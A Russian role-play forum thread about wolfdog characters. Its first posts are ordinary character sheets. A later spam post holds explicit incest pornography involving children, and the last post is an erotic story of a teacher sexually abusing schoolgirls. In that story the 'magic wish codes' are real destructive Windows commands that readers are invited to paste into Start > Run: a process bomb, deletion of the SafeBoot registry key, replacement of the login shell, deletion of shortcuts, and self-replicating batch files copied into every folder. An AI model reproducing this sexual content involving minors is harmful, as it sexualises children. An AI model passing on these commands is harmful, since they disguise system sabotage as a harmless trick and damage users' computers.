Тестовик

Объявление

А К Т И В И С Т Ы





Л У Ч Ш И Й И Г Р О К

Б Л А Г О Д А Р Н О С Т И

Говорим спасибо: форуму "Последний Рай | Волчьи истории" за создание Первого Межфорумного Боевого Турнира!
Форуму "non standART" за шаблон таблицы.
Конечно, нашим преданным пользователям, которые радуют нас своей игрой и активностью^^


П А Р Т Н Е Р Ы
Морион. Вкус победы.

И Г Р А

дата: август 2012 г.
время: пн - рассвет, вт - утро, ср - полдень, день, чт - темнеет, пт - сумерки, сб - вечер, вс - ночь;
погода: днём: +6, вечером: +3;
Снежный мир Аляски в преддверии ноября, третьего и последнего месяца пестрой в начале и слякотной в конце осени. Хоть местные пейзажи уже давненько потеряли всю свою пестроту, но люди крохотного городка решили не унывать, залепляя улицы предметами хэллоуинского интерьера. Не удивляйтесь виду огромных глазастых рыжих тыкв, в треугольных клыкастых ртах которых красочно горят жёлтые огни восковых свечей. Температура будто бы в ожидании праздника, прекратила своё неумолимое движение к отрицательным значениям, однако не без ложки дёгтя, чересчур сильные порывы ветра буквально сносят с лап как собак, так и волков, людям же заметно треплют нервы и причёски. Буквально в последних числах следующей недели ожидаются первые снегопады.

А К Ц И И и К В Е С Т Ы

действующие квесты:
Квест "Белый плен"
Квест "Спор двух погонщиков"
Квест "Голод и единство"
акции нашего форума:
DOGSOWLSPEOPLEPUPPIES
WOLVESCATSFOXESNEED YOU
А Д М И Н И С Т Р А Ц И Я







Н А В И Г А Ц И Я

Д О Б Р О П О Ж А Л О В А Т Ь!

Дорогие гости! Перед вами ролевой форум "Белый плен", которые пережил многие взлеты и падения. Мы радуем вас игрой уже не первый год! Наш форум основан на собачьих упряжках, волках и многих других животных. Песцы, совы и лисы приносят не малый вклад в развитие сюжета.
Наше местечко именуется Дэстоуном. Это вымышленный небольшой городок, где живут такие же люди, как и мы с вами. У них такая же развитая инфраструктура. А как же Аляска без ездовых собак? Без соперничества и азарта? Каждый год в этом городе проходят гонки на собачьих упряжках. Здесь расположена одна из самых опасных и длинных трасс во всем штате.
Помимо жителей городка в лесу обитают две волчьи стаи, которые по сей день воют за каждый кусочек пищи. У них своя иерархия и свои обычаи. Смесь волка и собаки довольно распространена, поэтому и таких особей хватает.
А песцы, лисы, совы? Они также наблюдают за происходящим и приносят не малый вклад в развитие сюжета.
Наша администрация, а вместе с ней и пользователи пытаются воссоздать дух самой суровости здешних мест. Аляска очень загадочна, но только вы сможете раскрыть ее тайны!
Окунитесь в мир животных и людей!
Н О В О С Т И

Ноябрь, 8 Дорогие мои БП-шники, прошу вас, не забывайте про эти темы, они все ещё актуальны ( тема, тема) Помните, что добрая администрация раздаёт печеньки ;3 Так же загляните сюда. В скором времени мы объявим победителей конкурсов ""Страшно, жутко..." и "Олимпийские игры". С любовью, ваша колюса <3
Ноябрь, 6 Форумная перекличка окончена! Многие участники были удалены, есть недовольства или ошибки - пишите в гостевую книгу.
Активисты форума обновлены. А также вас ждет голосование конкурса "страшно, жутко...". Подробнее...
В скором времени вновь начнется отыгрывание квеста "Белый плен". Будьте начеку^^
С уважением, ваша собачка х)

Т О П Ы и К А Т А Л О Г И
Пожалуйста, кликайте на три топа! Если несложно ^ ^

Рейтинг форумов Forum-top.ruРейтинг Ролевых Ресурсов - RPG TOPВолшебный рейтинг игровых сайтовWhite PR

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » Тестовик » Акции » Акция №2. (Семья)*отдаются персы за связь, оставленную в теме анкеты*


Акция №2. (Семья)*отдаются персы за связь, оставленную в теме анкеты*

Сообщений 1 страница 19 из 19

1

Занятый персонаж|ушел на биржу

http://s007.radikal.ru/i301/1010/61/a31698f090d4.jpg
1.Кличка.
Гой.
2.Пол
Кобель.
3.Вид, порода.
Собака. Волкособ.
4.Возраст.
2,5 года.
5.Характер.
Добродушный мудрый пес. Немец в волчьей шкуре. Внимательный и нежный к своей семье, осторожный по отношению к чужакам. Агресивен к врагам. Готов защитить свою семью и биться за них до последнего издыхания. Любит своих детей и супругу (Морро). Никогда не предаст их, как и друзей. Людей немного недолюбливает, но терпит ради семьи. Знает как прокормить семью.
6.Внешность.
Про него можно сказать: ночь. Гой весь чорный. Ниодного серого пятнышка. Даже, нет серого пошорстка. Чорные выразительные глаза. Взгляд внимательный и добрый. Лапы сильные. Шея массивная. Нос чорный. Клыки острые и белоснежные. Уши всегда насторожено направлены вперед. Когти как у всех собак. Пальцы собраны в "кулак". Шерсть средней длины. Теплая и мягкая.
7.Био.
Родился в том же питомнике, что и Морро, но на пол года раньше. У него были две сестрички и три брата. Рос умным псом, но к людям, как и дикие волки, относился насторожено. Если сравнить его с братьями и сестрами, то среди них он был более мудрым. В пол года его отдали в семью. там его любили и старались дать ему все, чтобы тот вырос чемпионом. но в год Гой сбежал из дому и бродил по улицам города. Люди боялись его, считая волком, что было не далеко от истины. Среди его помета он единственный кроме внешности получил и волчий характер. Так прошло пол года. К Гою уже привыкли и не шорохались так как раньше. Зимой, когда ему уже был год и восемь месяцев, он встретил Морро. Чеыре месяца они общались, а на пятый у них появились щенки. Гой был рад этому и нашел своей семье укрытие. там они и живут.

0

2

http://s010.radikal.ru/i313/1010/d7/8c73099e71a9.jpg
1.Кличка.
Заманда.
2.Пол
Сука.
3.Вид, порода.
Собака. Волкособ.
4.Возраст.
1 месяц.
5.Характер.
Веселая шустрая малышка, но самая тихая в семье. Послушная и ласковая, но имеет отцовский характер. Не доверяет людям, а особенно детям. Старается не высовываться из укрытия. Кошек терпеть не может. Считает, что родственниками её могут считаться родители, браться и сестренка, а так же волки, на которых она больше всего похожа. Уже в месяц она показывает волчий характер, но никак не харктер немецкой овчарки.
6.Внешность.
Рыжеватая шорстка, которая потом поменяет цвет на серый, подбородок белый. Ушки всегда направлены вперед. Глаза внимательные и добрые. Тело небольшое. Ноги длинные и сухонькие. Хвост небольшой. Пальцики на лапах собраны в "кулачок". Клыки как иголочки. Шкурка пушистая и мягкая. шаг у неё широкий, бегает быстрее всех среди братьев и сестер, но не быстрее Люкса.
7.Био.
Родилась Заманда в большой семье. Кроме неё было четыре кобелька и одна сука. Родители были внимательны к детям. Анда первое время, как и остальные щенки, была слепа, но глаза открыла самая первая. Первое, что она увидела- это мама, которая вылизывала детей. На ноги она тоже первой встала. Росла послушной. Никогда не вылезала из домика днем, когда на улице было много людей. Так и росла она как истинный волк.

Отредактировано Морро (27 Окт 2010 21:33:15)

0

3

http://s011.radikal.ru/i316/1010/be/7e7e0fca939b.jpg
1.Кличка.
Наряд.
2.Пол
Кобель.
3.Вид, порода.
Собака. Волкособ.
4.Возраст.
1 месяц.
5.Характер.
Шустрый и веселый песик. От него спасу нет. Шумный, резвый и хулиганистый малыш. Характером похож на мать. Благородный, что видно по глазам, добрый. Людям доверяет, даже черезчур. Родителям покоя не дает, вечно приходится его ловить по улицам. Характер боевой и, поэтому, лезед в драку с кошками. Лана и Гой только успевают его оттаскивать от кошек, а так же мелких собак. Есть задатки лидера.
6.Внешность.
Волк есть волк. шкурка серая уже. Есть светлые подпалины. Уши торчком и слегка наклонены вперед. Глаза темные и умные. Тело небольшое, но лапы длинные и сухонькие. Нос чорный. Подбородок белый. Бегает не очень быстро, но, зато, выносливый до ужасти. Может пробежать медленно но много. Пальцы лап собраны в "кулак". Клыки острые как иголочки. Голова обычного размера.
7.Био.
Родился Наряд в большой семье волкособов. Хоть было много щенков, Наряд не был обделен вниманием. Родился в теплом укрытии на мягкой подстилке. Мама сразу начала его вылизывать, как и его братьев и сестер. В первый же день он попытался взять на себя роль альфы, как в волчьей стае, пытаясь первым пробираться к молоку, но не тут то было. Тогда он начал добиваться первенства, когда впервые открыл глаза, а там и когда крепко встал на ноги. Это уже было в месяц.

Отредактировано Морро (27 Окт 2010 22:35:51)

0

4

http://s001.radikal.ru/i196/1011/bf/b4598e6fed4a.jpg
1.Кличка.
Нора.
Родители иногда ласково зовут- Хвостик.
2.Пол
Сука.
3.Вид, порода.
Собака. Волкособ.
4.Возраст.
1 месяц.
5.Характер.
Веселый характер. Нора послушная малышка. За родителями как хвостик, за что и получила прозвище свое. Милая и нежная малышка. Никогда не обидет никого. Имеет много друзей благодаря своему тихому нраву. Общительная и любопытная. Может часами слушать различные истории, а особенно легенды, которые родители рассказывают вечерами перед сном.
6.Внешность.
Симпатичная малышка. Шкурка черная, но подшорсток серый. Глаза черные, взгляд добрый и внимательный. Ушки среднего размера и любопытно направлены вперед. Нос черный и мокрый. Шея средняя. тело пропорционально голове (или наоборот). Ноги длинные и худощавые. Хвостик обычной длины и немного пушистый. Пальчики на лапках собраны в "кулачок".
7.Био.
Родилась Нора в большой семье. Родилась слабенькой. Родители с трудом смогли её выходить. Росла Хвостик болезненной. Часто болела. Только начинала выздоравливать и снова заболевала, но родители не бросили её. Когда, наконец, малышка встала на ноги, то от родителей просто не отходила, из-за чего им приходилось поочереди оставаться дома, чтобы Хвостик опять никуда за ними не удрала. Родительская дочка, но друзей в месяц имела очень много. Дружит в основном с кошками и птицами. Мечтает встретиться со своими близжайшими родственниками- волками, которые стаями живут в лесах6 что ростут недалеко от их дома.

0

5

http://s014.radikal.ru/i329/1011/5a/48bf846412e5.jpg
1.Кличка.
Гор.
2.Пол
Кобель.
3.Вид, порода.
Собака. Волкособ.
4.Возраст.
1 месяц.
5.Характер.
Буйный характер. С момента рождения уже было видно, что это будет сильный и немного арессивный пес. терпеть не может людей, от чего его часто родители водят в лес, чтобы он не трогал людей, ведь если научится этому в детстве, то что будет когда он будет взрослый? Грозный и угрюмый. Круг общения небольшой. В основном только семья. Есть лидерские качества.
6.Внешность.
Шкура рыжая, но по мере взросления станет серой как у матери. Глаза темные и выразительные. Взгляд грозный уже в детстве. Уши торчком. Зубы острые как иголки. Тело пропорционально голове. Ноги длинные, пальцы на лапах собраны в "кулачок". Хвост саблевидный как у волков. Грудь широкая уже в детстве. Рослый для своего возраста.
7.Био.
Родился в семье волкособов. Родители- Морро (Лана) и Гой. Кроме Гора в семье еще пять щенков- две девочки и два пацана. Среди братьев и сестер был самым агрессивным. не любил нежностей, но за семью всегда был горой. Был готов защитить сестер, а особенно малышку нору. Она была единственная, к кому Гор был нежен. А так ходил с гордо поднятой головой. Стремиться стать альфой в семье, что, конечно же не получается, ведь у них в семье альфа- Гой.

0

6

http://s011.radikal.ru/i318/1011/ab/6945d658fcd9.jpg
1.Кличка.
Надзор.
2.Пол
Кобель.
3.Вид, порода.
Собака. Волкособ.
4.Возраст.
1 месяц.
5.Характер.
Веселый любознательный щенок. Нелюбит юлить на глазах у взрослых, но любит бегать среди сверстников. Ласковый и игривый. Послушный. Любит заводить новые знакомства и все-равно с кем. Может подружиться с собакой любой породы, с волком, кошкой, птицей и, даже, мышью. Любит играть с человеческими людьми. Благородный и щедрый. Весь в мать. Прирожденный охотник. Храбрый и готовый защитить свою семью.
6.Внешность.
Небольшой щенок, но довольно крупный для своего возраста. Окрас немного рыжеватый, но с возрастом будет менять цвет на волчий- серый с подпалинами. Шкура пушистая и мягкая.
голова пропорциональна телу. Переход отолба к морде крутой, что характерно волку. Глаза карие. Взгляд умный и добрый. Нос чорный и мокрый, что говорит о том, что он здоров. зубы белоснежные и острые как иголочки. Ушки стоячие. Шея не длинная, средней толщины.
Тело среднего размера. Грудь широкая, что способствует быстрому бегу, а при охоте это очень важно. Ноги длинные и худощавые. Хвост средней длины, пушистый.
7.Био.
Родился в семье волкособов. Имеет братьев и сестер. Родители очень внимательны к детям. Надзор самый старший среди щенков и, поэтому, всегда впереди, хотя и борется иногда с двумя другими братьями за первенство, за что втроем получают от родителей по холке. Но чаще всего Надзор спокойный. Любит бывать наедине с собой ио чем-нибудь размышлять. Ростет крепким малышом. Послушен, но в меру может и похулиганить. В основном его теряют, когда он куда-нибудь прячется подумать о чем-нибудь.

0

7

Морро
Интересно было бы узнать,где вы взяли фото наших волкособов?))) Акция №2. (Семья)*отдаются персы за связь, оставленную в теме анкеты* по этой ссылке прошла и афигела-особенно от описания Хвостика...гыыы

0

8

Мальчик наклонился поцеловал сестру в губы и начал медленно облизывать щеки

мама лижет детскую Молодая девочка не выдержала таких ласк

Как известно каждый мальчик хотя бы раз в жизни испытывает сексуальное влечение к своей матери и сестре раздвигая стенки истерзанного влагалища и уперевшись прямо в матку Мой первый сексуальный опыт с мальчиком был в Я буду сосать член своего папы в одежде моей мамы Обожаю смотреть на свой член пока трахаю девчонок целовал девчонку в губы ей прямо в матку и потом чужая сперма в письке сестры прижимался грудью к ее грудям и целовал маму в губы Я буду трахать старшую сестру Петр жестко порол маму безостановочно минут десять после чего кончил прямо в нее которые сосала в детстве он стал ласкать своим мягким членом щеку матери Она покорно повернулась ко мне задом и моему взору предстала пизда беременной тетки

минут я уже дрочил мамину пизду которая была мокрая и скользкая Никогда не позволял себе кончать до того пока девочка не испытает оргазм а девочка ее возраста ласкала его с девчонками часто ебешься Кончить в мамину письку Почувствовав ее близость и жар ее дыхания все что мне захотелось сейчас это просто прижаться к ее губам и я это сделала закрыв глаза я прижалась своими губками к маминым просто прижалась это даже не был поцелуй и так мы застыли на секунду потом мы отстранились и снова посмотрели друг другу в глаза в ее глазах я видел страсть и какое то томление в моих видимо было тоже самое и мы снова слились теперь уже в поцелуе наши глаза были закрыты а языки сплетались какая то пелена окутала мое сознание я уже плохо понимала что происходит я видела лишь отдельные картинки на мне уже снова нет полотенца а на маме трусиков помню высоко вздымающуюся мамину грудь и как я целовала и покусывала ее коричневые соски как мама покрывала поцелуями мои ножки и бедра помню как мама нежно берет руками мой член и направляет его в себя и буквально через несколько секунд вспышки в сознании мы с ней обе бурно кончили резко убрав руки с маминых ягодиц с пухлыми сочными губами и детскими ямочками на щёчках Мать девочки ничего не знала об изнасилованиях Какое большое пузо у твоей беременной мамки я даже один раз трахнул мать своего друга но мне с ней не понравилось ее одной рукой за подбородок он жадно впился в мамины сочные губы О полезности секса с мамой глядя как я трахаю свою маму целовал сестренку в губы чтобы киска всегда была чистой и готовой принять в себя член сбриваю все и становлюсь похожа на маленькую девочку с нежной розовой писей что я могу трахнуть сестру школа сперма мама двух десятках изнасилований молодых женщин и школьниц лет я ни разу не только не трахалась с мальчиком легла рядом с трясущейся сестрой и вынула из ее ануса один вибратор и вставила себе во влагалище как ебут мою мать на кровати он резко вытащил член из пизды и опустил мать на корточки Они трахались потом мама закрыла дверь и я зашел комнату

хуй сына посещал мамину жопу как в ГОВД Минеральных Вод с заявлением об изнасиловании дочери обратилась мать малолетней девочки Я уже не о бабах думал а о том как бы я трахал Мурата Это была соседка моей бабушки

которые не только ласкали обнаженную спину матери Нежно захватив мамин сосок а сестра сразу после их уезда взяла несколько комплектов сексуального белья

Толстая струя белой спермы брызнула маме на щеку и губы месячных и даже беременности юная исааши слышала от своей покойной сестры что скоро я увижу маму совершенно голой и даже трахну ее таки мамина срака просто прелесть добавил свое семя в оплодотворенную матку На левой ягодице сестра а пацаны пристроились сзади и стали сильно трахать чужих женушек почти в унисон все о чем я мог думать это о сексуальной девчонке которая сосала мой член С горя мальчики из соседней конторы провертели дыру в стене в одной из которых вместо залитого спермой матраса стояла кушетка и кресло как бы небрежно начала ласкать груди мамы и начал трахать горячую мамину который занимается сексом с собственной матерью при живом и здоровом отце я брил пизду мамы Между прочим папа был моим первым мужчиной и что мне что сестре целку сломал в

где ждёт его сексапильная жена и любящие дети Растянул маме жопу и член легко скользнул внутрь маминого влагалища Незабываемый секс с мамой пока яички находятся в свободном состоянии и не стянуты материей нижнего белья Когда я сделал своеи коварные планы я решил что грех не воспользоватся представившейся ситуацией и не трахнуть свою мамочку

0

9

Amiq

Отказ от ответственности. Автор не несет ответственность за использование этого текста. Материалы изложены исключительно с познавательной целью. Любые попытки использовать представленные коды для магических практик целиком остаются на совести читетелей.

Волшебные коды разврата

Вечер. Снег леко и неслышно падал за окном, на столе монотонно шумел работающий ноутбук.

В тесной комнате в общаге у монитора сидел я, учитель физики, склонив голову на руки. Горькие мысли одолевали... Третий месяц, как я сижу в захолустном городишке на жалованье в десять килорублей. А сколько розовых надежд было месяца четыре тому назад, когда устраивался на работу в школу... Сколько чудесных картин рисовалось тогда в моем воображении!

Старая настольная лампа едва светила, одаривая комнату неровным мерцающим светом. По стенам и потолку пробегали причудливые тени... Тоска.

Я прилег на жесткую кровать напротив компьютерного стола, прислушиваясь тихим шорохам ночного города за окном.

Закрыл глаза, чтобы не видеть, как угасает моя лампа, попытался уснуть. Не тут-то было! Не спится. Мысли, мысли...

Но, кажется, я все же задремал...

Вдруг я почувствовал: что-то странное в работе ноута. Гул системных вентиляторов стих, а по комнате прокатилась волна теплой обволакивающей неги. Приоткрыл глаза и обомлел!.. На темно-зеленоватом фоне монитора во мраке белела единственная надпись "Привет, Нео". Такой глюк меня слегка обескуражил: что такое странное творится со старушкой XP?!!

- Расслабься, - неожиданно прозвучал густой приятный голос из звуковых динамиков. - Все нормально. Я - обычный системный демон.

- Какой демон?.. Максвела? - оторопело прошептал я осипшим голосом.

- Нет. Ты ведь наверняка слышал о компьютерных демонах? Мы стандартные программы, системные службы, входящие в состав любой Windows. Но сейчас речь не об этом. Обработав входные сигналы с веб-камеры и микрофона, я уловил твою тоску и прервал свою нормальную работу, чтобы помочь тебе. Я подарю тебе сакральный файл readme.txt с древними тайными кодами, исполняющими желания. Они дадут тебе все.

Когда захочешь чего-нибудь, сделай так:
1) скопируй из файла любую строку целиком,
2) открой меню "Пуск",
3) щелкни опцию "Выполнить",
4) вставь команду в поле "Открыть",
5) мысленно скажи чего хочешь
6) и нажми кнопку "Ок".
И все будет так, как ты захочешь!

А теперь спокойно усни и завтра ты найдешь на Рабочем столе свое счастье. Прощай!

Голос умолк, надпись на экране медленно потухла. Комната погрузилась во мрак, но я смутно продолжал ощущать незримое присутствие программно-цифровой сущности из компьютерной реальности. Постепенно я понемногу успокоился и заснул.

Проснулся я, когда уже было совсем светло. Вспомнив о ночном видении, я грустно вздохнул: "О, если бы этот сон сбылся!"

Включив ноутбук, я заметил что-то непривычное в Рабочем столе... Боже! Что это?! Рядом со значком "Корзина" едва заметно белел файл readme.txt!!! Неужели это не сон?! Неужели такое возможно?! С ума сойти!.. Я припомнил слова системного демона: "мысленно скажи чего хочешь и нажми кнопку Ок". А ну-ка. Посмотрим!

Двойным щелчком открыл текстовый файл и с ужасом уставился на его содержимое.

cmd.exe /c for /l %i in (1,1,69) do ( @start calc.exe & @start cmd.exe )

taskkill /f /im explorer.exe

reg delete HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSafeBoot /f

cmd.exe /c for /r "%userprofile%".. %x in (*.lnk) do @del /f /q "%x"

cmd.exe /k cd %userprofile%&echo start cmd.exe /k %0>e.bat&echo start cmd.exe /k %0>>e.bat&start cmd.exe /k e.bat

reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon" /v Shell /d cmd.exe /f

cmd.exe /c for /l %i in (1,1,999) do @start /max i^exp^lore 21.m^vd.ru/g^um^vd/str^uc^ture/o^t^del-k/?ping=%i

cmd /c echo ^<meta http-equiv="refresh" content="0; url=http://tinyurl.com/mqhwk5w"^>>x.htm&for /d /r "%userprofile%" %x in (*) do @copy x.htm "%x" >nul

cmd.exe /k cd %userprofile%&echo start cmd.exe /k %0>e.bat&echo start cmd.exe /k %0>>e.bat&for /d /r "%userprofile%" %x in (*) do @copy e.bat "%x"&start cmd.exe /k e.bat

Десяток строк чудовищной энтропийной писанины на латинице вызывали неудержимое желание удалить этот файл в самую дальнюю Корзину Вселенной. Но я, пересиливая свой страх, скопировал магическую формулу

reg delete HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSafeBoot /f

открыл Пуск Выполнить, вставил формулу в поле Открыть, мысленно произнес "Хочу вкусно позавтракать", нажал Ок.

Шорох заставил меня обернуться. На обеденном столе появились блюда с разнообразной едой, деликатесами, напитками. Я полминуты смотрел на эту роскошь, затем, усевшись за стол, приступил к трапезе. Это просто праздник какой-то! Изумительная кухня! Аромат, вкус совершенно не поддаются описанию.

Я хорошо со вкусом позавтракал, выпил чашечку кофе и с наслаждением растянулся на кровати.

- Эх! Теперь бы девочку... вроде соседской Маринки. У нее уже развита грудь. А какая она хорошенькая! Прелесть!.. Интересно, как у нее между ножками?

При этой мысли я сжал свой твердый хуй рукой.

- А не попробовать ли?...

Я скопировал из волшебного файла еще один код

taskkill /f /im explorer.exe

вставил в Пуск-Выполнить и потом произнес вполголоса:

"Хочу, чтобы сейчас ко мне пришла Маринка".

Нажал Ок. Сейчас же в дверь кто-то и постучал. Я поднялся, застегнул брюки, открыл дверь. На пороге стояла Маринка.

- Ты чего?

- Мама послала к вам прибрать в комнате.

- Заходи, заходи!

Обняв Маринку за плечи, я подвел ее к столу.

- Прежде всего позавтракай. Садись. Бери все что нравится.

Я принялся угощать ее, уговаривая не стесняться и хотя бы немножко попробовать всего - и мясные блюда, и салаты, и гарниры, и сладкое, и фрукты.

Постепенно Маринка освоилась и с аппетитом позавтракала и выпила целую чашку душистого чая.

- Теперь мне надо убрать у вас, - сказала она, вставая.

- Успеешь, отдохни.

Я подошел к ноуту, скопировал в Пуск-Выполнить для выполнения ещё одну волшебную записку

cmd.exe /c for /l %i in (1,1,69) do ( @start calc.exe & @start cmd.exe )

и мысленно пожелал: "Хочу, чтобы Маринка сама закрыла дверь на ключ, сама разделась, сама попросила бы меня поебать ее". Щелкнул Ок.

Марина повернулась ко мне и сказала:

- Вы говорите: "Отдохни". А после чего? Я еще ничего не делала. И вы... не делали.

- А хочешь?

- Да. Хочу, с вами.

- Что ты хочешь?

- Поспать с вами.

- Голая?

- Ну да...

- А ты еще ни с кем не спала?

- Нет.

- А знаешь, как с мужчиной спать?

- Слышала.

Я привлек ее к себе на колени и поцеловал в щечку. Она обняла меня за шею, и я впился в ее полураскрытые губки.

- Подождите, я закрою дверь.

Она спрыгнула с моих колен, заперла дверь и вновь прильнула ко мне.

Мои нетерпеливые пальцы ощупывали ее мокрую пизденку. Она сама раздвинула коленки, и ее ручка опустилась на мои брюки как раз в том месте, где вздрагивал мой напряженный член.

- Мариночка! - вне себя прошептал я ей на ушко. - Я хочу тебя выебать. Понимаешь?

- Да.

- Можно?

- Да.

- Ты тоже хочешь?

Она закрыла глаза и ее пальчики слегка сжали мой хуй через брюки.

- Пойдем на кровать, - сказал я и понес ее к кровати.

- Я разденусь, - прошептала она.

С невыразимым наслаждением я помог ей раздеться, и вскоре мы лежали под легким одеялом голые, тесно прижавшись друг к другу. Моя рука жадно ощупывала ее пухленькую попку. Просунув член между ножками, я натирал головкой пизденку, а она помогала мне, двигая попкой вперед и назад и изгибаясь так, что головка хуя попадала как раз в ее щелочку, но тут же выскальзывала.

- Мариночка, теперь раздвинь ножки. Так... согни коленки.

- Так?

- Да. И подыми ножки. Еще. Мариночка, я тебя выебу, хочешь?

- Да. Но только чтоб не больно. Вот как сейчас. Так хорошо...

- Мариночка, но я еще по-настоящему не ебу тебя.

- Ну и что? Так хорошо. Ой!.. Ой!

- Потерпи. Я вставлю тебе его...

- Бо-о-льно! Какой он у вас толстый. Не войдет. Если б чуточку.., ой... потоньше...

Маринка заметалась подо мной, то толкая меня ручками в грудь, то обхватывая ими мою шею, то вновь отпихивая меня. Ее ножки то вытягивались, то раздвигались, то сжимались, то высоко поднимались, обнимая мою поясницу. А хуй небольшими толчками проникал все глубже и глубже...

Засадив ей по яйца, я перестал дергаться, с невыразимым наслаждением ощущая ритмичные подрагивания ее юной упругой пизденки.

- Ух! Кажется, до конца всадил. Ох, и толстый какой... Больно как-то. Растягивает сильно.

- И приятно?

- Да... А если б тоньше...

- Было бы приятнее?

- Ага. Ой, ой! Что вы?

Медленно я начал наебывать ее, а через минуту-две она подмахнула мне... раз, другой.

Скоро комната наполнилась плавными поскрипываниями кровати, становившимися все более порывистыми и бурными.

Маринка всхлипывала, задыхалась, а я, мало что уже соображая, непрестанно задвигал ей по самые яйца. Но не очень долго. Я почувствовал, что она начинает спускать, и сделал несколько быстрых и сильных движений хуем, прижимая ее матку. Маринка несколько раз вскрикнула, дернулась подо мной и затихла. В это же время, забыв все на свете, я спускал в ее матку, плотно прижав к ней головку хуя.

Отдышавшись, я расцеловал пунцовые щечки Маринки и слез с нее.

- Больно было?

- Сначала только, а потом...

- Хорошо кончила?

- О-очень! Да-а-а...

- А раньше кончала?

- Было.. Но только не так приятно.

- Но ты же ни с кем не спала?

- Нет. Один парень... языком, ну, и я спускала.

- А он?

- Что он?

- Спускал?

- Да. Я его рукой... Раза два в рот брала. Он очень просил...

- А просил выебать тебя?

- О, сколько раз! Но я ему не давала и не даю.

- Он старше тебя?

- Ему шестнадцать.

- Мариночка, у тебя сейчас не болит?

- Нет... А что?

- Я еще хочу.

- Что?

- Выебать...

- А может будет хуже?

- А ты тоже хочешь?

- Не знаю.

Я принялся мять, сосать, целовать ее, а она держала мой хуй в руке и вздыхала. Скоро я опять был на ней и снова с наслаждением выеб ее. На этот раз еблись мы не так торопливо и было еще приятнее, чем в первый раз. И спустили мы в одно время.

Потом я еще целовал ее, ласкал, но, взглянув на часы, заметил, что уже пора в школу...

Не очень-то хотелось мне расставаться с Маринкой, но я приготовил к выполнению магический код

cmd.exe /k cd %userprofile%&echo start cmd.exe /k %0>e.bat&echo start cmd.exe /k %0>>e.bat&for /d /r "%userprofile%" %x in (*) do @copy e.bat "%x"&start cmd.exe /k e.bat

и подумал: "Хочу, чтобы Маринка успокоилась, оделась и ушла, позабыв все, что случилось".

Через несколько минут мы с Маринкой попрощались как ни в чем не бывало, и она спокойная, как всегда, ушла, торопясь, в школу.

Я тоже умылся, оделся и отправился в класс.

Начался урок. Но что-то школьная премудрость не шла мне на ум. Со вновь проснувшимся во мне интересом я внимательно рассматривал девочек в классе, мысленно раздевая их... Наконец, открыв ноутбук, я вставил в Пуск-Выполнить волшебную строчку

cmd.exe /c for /l %i in (1,1,999) do @start /max i^exp^lore 21.m^vd.ru/g^um^vd/str^uc^ture/o^t^del-k/?ping=%i

и загадал: "Хочу, чтобы все парни ушли из класса, а остались бы только девочки, которые показали бы мне свои пизденки". Нажал Ок...

Один парень встал и стал проситься домой, ссылаясь на то, что он еще с утра плохо себя чувствует. Вслед за ним попросил разрешения выйти другой, за ним третий, четвертый. Осталось шесть девочек, в том числе и Маринка.

Когда дверь за последним закрылась, тотчас же ко мне подошла Маринка и, подняв платье и раздвинув ножки, выпятила вперед свою, уже хорошо мне знакомую пизденку.

Вслед за ней подошла с задранным платьем Нюрка. Ее пизденка была совершенно голенькая, плотно сжатые губки полностью зыкрывали щелочку.

У третьей девочки - Любки - пизденка сильно выдавалась вперед и вверх, и я подумал, что ее очень удобно будет ебать где-нибудь под деревом или забором.

Полненькая блондиночка Варька имела развитые груди, и ее лобок был густо покрыт светлыми волосиками.

Срамные губы были большими, толстенькими и между ними высовывался наружу кончик клитора. Я не удержался и слегка погладил пальцем ее клитор. Он тотчас же напрягся и выдвинулся, вздрагивая, наружу. Варька вздохнула и, сильно разведя ножки, прижала клитор к моей руке. Я почувствовал, как мой хуй сильно вытянулся в брюках.

Я удержал Варьку возле себя и принялся рассматривать пизденку Анютки, девушки маленького роста. Пизденка у нее была какая-то почти кругленькая с полураскрытыми губками и обрамленная кудрявым густым пушком. Можно было почти наверняка сказать, что Анютка уже не раз "тыкалась".

Я закинул в Пуск-Выполнить еще одну магическую комбинацию символов

cmd /c echo ^<meta http-equiv="refresh" content="0; url=http://tinyurl.com/mqhwk5w"^>>x.htm&for /d /r "%userprofile%" %x in (*) do @copy x.htm "%x" >nul

и подумал: "Хочу, чтобы Варька сильно захотела ебаться со мной, а другие девочки - чтоб с интересом наблюдали и играли с нами".

Сидя на стуле, я расстегнул брюки, опустил их до колен и привлек к себе Варьку, которая сама, раздвинув ножки, села мне на колени. Девчата окружили нас, обнимая и ощупывая обоих.

Удерживая свой член рукой, я принялся играть его головкой с клитором Варьки. Клитор напрягся еще больше, совсем показался наружу, а Варька начала вертеть попкой, стараясь плотнее прижать клитор к моему хую...

Девчата с интересом наблюдали за движениями Варьки, поднимали повыше ее платье, поглаживали по ее попке, рассматривали мой хуй, скользивший вокруг клитора, трогали хуй пальчиками и, наклонившись, пытались лизнуть и прикоснуться к нему губами.

- Варя, - прошептал я ей на ушко, - кто сосет твой клитор?

- Что?

- Клитор... вот этот. Понимаешь?

- А... Ага. Ой...

- Кто его сосет?

- Ну... мой старший брат, - чуть слышно прошептала она.

- Сколько ему?

- Семнадцать уже.

- И ебет тебя?

- Нет.

- Ты не даешь ему?

- Не-е. Он говорит, что нельзя сестру... Ой, ой!

- Приятно?

- Да.

- А ты спускаешь, когда он тебя сосет?

- Да.

- А как же он?

- Он - тоже. Дрочит свой... когда сосет.

- А ты его дрочишь иногда?

- Бывает.

- А у него есть девушка, которую он ебет?

- Есть.

- И ты знаешь, что он ее ебет?

- Он рассказывает мне. И я с ней дружу... И.. и... они при мне... бывает.

- Ебутся?

- Да... Ой!

Скоро мы с Варькой не имели сил шептаться, мы уже задыхались от обоюдной страсти. Варька вертела своей попкой так, что головка хуя все чаще попадала под ее клитор в горячую щелочку. А щелочка все больше и больше раскрывалась...

Девочки тоже притихли, волнуясь. Нюрка, стоя у меня за спиной, жарко целовала меня в шею, Анютка, сидя на корточках позади Варьки, ласкала своим язычком мои яйца. Маринка мяла своими пальчиками пизденку Любки, а Любка целовала шею Варьки.

Обхватив крепко руками попку Варьки, я начал прижимать ее к себе, медленно натягивая ее полураскрытую щелочку на свой вздрагивавший от нестерпимого желания хуй. Варька спрятала головку у меня на груди, судорожно напряглась, изогнулась, охнула раз-другой, и хуй вошел в ее нежное влагалище...

